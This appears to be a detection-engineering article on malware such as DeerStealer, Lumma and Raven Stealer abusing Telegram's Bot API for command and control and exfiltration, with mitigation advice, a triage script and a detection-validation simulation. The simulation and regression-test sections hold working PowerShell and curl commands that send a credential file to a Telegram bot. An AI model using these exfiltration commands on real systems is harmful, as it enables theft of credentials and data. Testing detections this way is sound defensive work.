The Detection & Response Chronicles: Exploring Telegram Abuse
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article explains how several threat actors misuse Telegram’s Bot API and channels in enterprises for command and control, data exfiltration, and victim monitoring. Malware families including DeerStealer, Lumma Stealer, Raven Stealer, and a trojanized XWorm builder hard-code bot tokens or channel IDs and call endpoints such as /sendMessage and /sendDocument. It includes Microsoft Defender and Sentinel detection queries focused on suspicious process command lines and traffic to api.telegram.org. Key guidance is to baseline legitimate Telegram use and block the API where it isn’t needed.
Investigation
NVISO’s SOC reported four intrusion attempts observed across October 2025 and March 2025 where Telegram was used at different points in the attack lifecycle. The write-up highlights campaigns such as Lunar Spider monitoring victims via fake captcha lures, DeerStealer sending operator notifications through curl, Lumma Stealer pulling C2 details from Telegram channels, Raven Stealer exfiltrating archived collections, and an XWorm builder relying on the Bot API for both exfiltration and C2. Analysts extracted indicators including process command lines, network destinations, and relevant file names.
Mitigation
Establish a baseline for legitimate Telegram usage, then block outbound access to api.telegram.org in environments where it is not required. Watch for uncommon processes (e.g., curl, powershell, wscript) initiating connections to the API and investigate any scripted Bot API interactions. Tune detections to suppress expected behavior such as known browsers launching telegram.exe, and prioritize long-polling or webhook-style requests originating from suspicious binaries or unexpected hosts.
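As an added worked example (not code from the article or from NVISO), the triage logic described above applied to constructed sample telemetry: the normalised event fields, the expected-process baseline and the severity mapping are assumptions, and the token regex follows the /bot<token>/<method> URL shape the article names.

```python
import re
from dataclasses import dataclass

TELEGRAM_API = "api.telegram.org"
# Baseline: the official client and known browsers are expected to reach Telegram; anything else is reviewed.
EXPECTED_PROCESSES = {"telegram.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Bot API calls look like /bot<token>/<method>; the captured token is what must be rotated after an incident.
BOT_CALL_RE = re.compile(r"/bot(\d+:[A-Za-z0-9_-]+)/(\w+)")
# sendMessage/sendDocument are the exfil endpoints named above; getUpdates is the long-polling C2 pattern.
HIGH_RISK_METHODS = {"sendMessage", "sendDocument", "getUpdates"}

@dataclass
class Event:
    kind: str            # "process" (creation) or "network" (connection); assumed normalised schema
    process: str         # image that ran or initiated the connection
    parent: str          # parent / initiating process
    command_line: str
    remote_url: str = ""

def classify(ev: Event):
    """Return a finding dict for suspicious Telegram API use, or None when the event is tuned out."""
    haystack = f"{ev.command_line} {ev.remote_url}"
    if TELEGRAM_API not in haystack.lower():
        return None
    if ev.process.lower() in EXPECTED_PROCESSES:
        return None  # same suppression as the rule's InitiatingProcessFileName filter
    m = BOT_CALL_RE.search(haystack)
    method = m.group(2) if m else None
    return {"process": ev.process, "parent": ev.parent, "method": method,
            "token_to_rotate": m.group(1) if m else None,
            "severity": "high" if method in HIGH_RISK_METHODS else "medium"}

def scan(events):
    return [f for f in map(classify, events) if f]

# Constructed sample telemetry (not from the article); tokens use Telegram's documented placeholder format.
SAMPLE_EVENTS = [
    Event("process", "curl.exe", "powershell.exe",
          r'curl.exe -X POST -F "document=@C:\Temp\creds.txt" '
          "https://api.telegram.org/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/sendDocument?chat_id=987654321"),
    Event("network", "Telegram.exe", "chrome.exe", r'"C:\Program Files\Telegram Desktop\Telegram.exe"',
          "https://api.telegram.org/"),
    Event("network", "wscript.exe", "explorer.exe", r"wscript.exe C:\Users\Public\update.vbs",
          "https://api.telegram.org/bot987654:EXAMPLE-token_only/getUpdates?offset=1"),
    Event("network", "msedge.exe", "explorer.exe", "msedge.exe", "https://api.telegram.org/bot1:x/getMe"),
]
```

Running scan(SAMPLE_EVENTS) yields two findings (curl.exe calling sendDocument and wscript.exe long-polling getUpdates), each carrying the bot token that should be rotated, while the Telegram.exe and browser events are suppressed by the baseline.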
Response
When activity is detected, isolate the affected endpoint, stop suspicious processes, and preserve command-line arguments along with DNS, proxy, and network telemetry. Perform deeper forensics to identify follow-on payloads associated with campaigns like DeerStealer or Raven Stealer. Rotate any exposed bot tokens, disable or revoke abused Telegram channels, and contain the spread by blocking related indicators. If abuse is confirmed, escalate reporting through Telegram’s official channels and document the incident for recurrence prevention.
Attack Flow
Detections
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Suspicious Defender Exclusions Modification (via cmdline)
- Suspicious Process Utilizes a URL in the Command Line (via cmdline)
- IOCs (Emails) to detect: The Detection & Response Chronicles: Exploring Telegram Abuse
- Detect Non-Browser Communication with Telegram API [Windows Network Connection]
- Detection of Malicious Telegram API Usage [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
An adversary with a compromised Windows host wishes to exfiltrate a harvested credential file (creds.txt) to a Telegram bot they control. To avoid storing a custom binary, they use the native curl.exe (installed via Windows 10 optional features) to POST the file to https://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocument. The command is executed from PowerShell, ensuring the process creation event records a command line that contains "api.telegram.org". Because the process is curl.exe, the rule's filter (InitiatingProcessFileName: "telegram.exe") does not suppress the alert.

    # Variables (replace with attacker-controlled values)
    $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
    $ChatID   = "987654321"
    $FilePath = "C:\Temp\creds.txt"

    # Ensure the directory and file exist (simulated credential dump)
    New-Item -ItemType Directory -Path (Split-Path $FilePath) -Force | Out-Null
    Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!"

    # Execute the exfiltration via Telegram Bot API
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"
    curl.exe -X POST -F "document=@$FilePath" $Url
Regression Test Script: The script below reproduces the exact steps, suitable for automated BAS runs.
    #--------------------------------------------
    # Regression Test - Telegram API Exfiltration
    #--------------------------------------------
    param(
        [string]$BotToken = "REPLACE_WITH_TOKEN",
        [string]$ChatID   = "REPLACE_WITH_CHATID",
        [string]$TmpDir   = "$env:TEMP\TelegramBAS"
    )

    # Create temp workspace
    New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null

    # Simulated credential file
    $CredFile = Join-Path $TmpDir "creds.txt"
    "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile

    # Build API URL
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"

    # Invoke exfiltration
    Write-Host "[*] Exfiltrating $CredFile to Telegram..."
    curl.exe -X POST -F "document=@$CredFile" $Url

    # Simple success indicator (checks only that curl.exe exited cleanly, not that the file was delivered)
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Exfiltration command executed."
    } else {
        Write-Error "[-] Exfiltration failed."
    }
Cleanup Commands: Remove the temporary file and directory; optionally terminate any lingering curl.exe processes.

    # Cleanup temporary artifacts ($TmpDir as defined in the regression test script)
    Stop-Process -Name "curl" -ErrorAction SilentlyContinue
    Remove-Item -Path $TmpDir -Recurse -Force -ErrorAction SilentlyContinue
    Write-Host "[*] Cleanup complete."